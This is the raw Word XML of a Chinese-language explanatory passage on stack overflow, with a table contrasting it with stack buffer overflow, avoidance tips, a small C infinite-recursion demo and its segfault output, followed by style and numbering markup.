      <w:tr w:rsidR="0001234A" w14:paraId="77A1C9A8" w14:textId="77777777" w:rsidTr="0001234A">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E74DEC" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA52004" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75CA05A7" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6247CD74" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否安全漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0001234A" w14:paraId="317157C7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C22F2A" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>栈溢出（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78981EEB" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>栈空间耗尽（如无限递归）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE71434" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>程序崩溃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01FF1265" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通常不是安全漏洞（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0001234A" w14:paraId="75F2798A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="644131C7" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>栈缓冲区溢出（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Buffer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341F90E3" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>向局部数组写入超过其边界的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A061607" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能覆盖返回地址，劫持控制流</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1687E1EA" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是严重的安全漏洞（可被利用执行任意代码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="722D916D" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然名字相似，但后者是安全攻击的经典手段（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>gets()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>strcpy()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等不安全函数）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5930EAD2" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="如何避免栈溢出"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何避免栈溢出？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD6D9B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>确保递归有正确的终止条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并考虑使用迭代替代深度递归。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C529BB0" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>避免在栈上分配大对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：大数组或结构体应改用堆分配（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B9A9D" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加栈大小（谨慎使用）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD72D2F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>ulimit -s 16384</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED4E18" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器选项：如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-Wl,--stack,16777216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9EFBE" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程创建时可指定栈大小（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pthread_attr_setstacksize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF43FC" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用尾递归优化（若语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>编译器支持）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如某些函数式语言或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对特定递归的优化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FED0C" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="示例递归导致栈溢出"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：递归导致栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5984F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>void recurse(int n) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("%d\n", n);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    recurse(n + 1); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无限递归</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>int main() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    recurse(0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10FC52" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACA5BD" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>261872</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>261873</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Segmentation fault (core dumped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F163A" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="00B17DC7">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E4B5B8" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="总结"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C170E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出的本质是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序使用的栈空间超过了系统为其分配的上限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，常见于无限递归或大局部变量。它会导致程序崩溃，虽不一定是安全漏洞，但在开发中需高度重视。理解栈的工作机制有助于编写更健壮、高效的代码。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:sectPr w:rsidR="0001234A" w:rsidSect="00E510A8">
      <w:footnotePr>
        <w:numRestart w:val="eachSect"/>
      </w:footnotePr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>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等线">
    <w:altName w:val="DengXian"/>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等线 Light">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5206470C"/>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63D2F466"/>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B2C24AF2"/>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1591961244">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="735665224">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="411511771">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="129644881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800878336">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1319765716">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="321009283">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="176969348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79930052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SystemFonts/>
  <w:bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter/>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01234A"/>
    <w:rsid w:val="0001234A"/>
    <w:rsid w:val="00A51183"/>
    <w:rsid w:val="00E510A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E0EC66"/>
  <w15:docId w15:val="{F9BFBE35-2C73-4ED5-B346-B11E187FC5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style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:link w:val="10"/>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0"/>
    <w:link w:val="20"/>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0"/>
    <w:link w:val="30"/>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0"/>
    <w:link w:val="40"/>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0"/>
    <w:link w:val="50"/>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6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:link w:val="60"/>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0"/>
    <w:link w:val="70"/>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8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:link w:val="80"/>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9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:link w:val="90"/>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qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:link w:val="a5"/>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a5">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00A10FD9"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="副标题 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AbstractTitle">
    <w:name w:val="Abstract Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="Abstract"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="300" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Abstract">
    <w:name w:val="Abstract"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:after="300"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="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30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
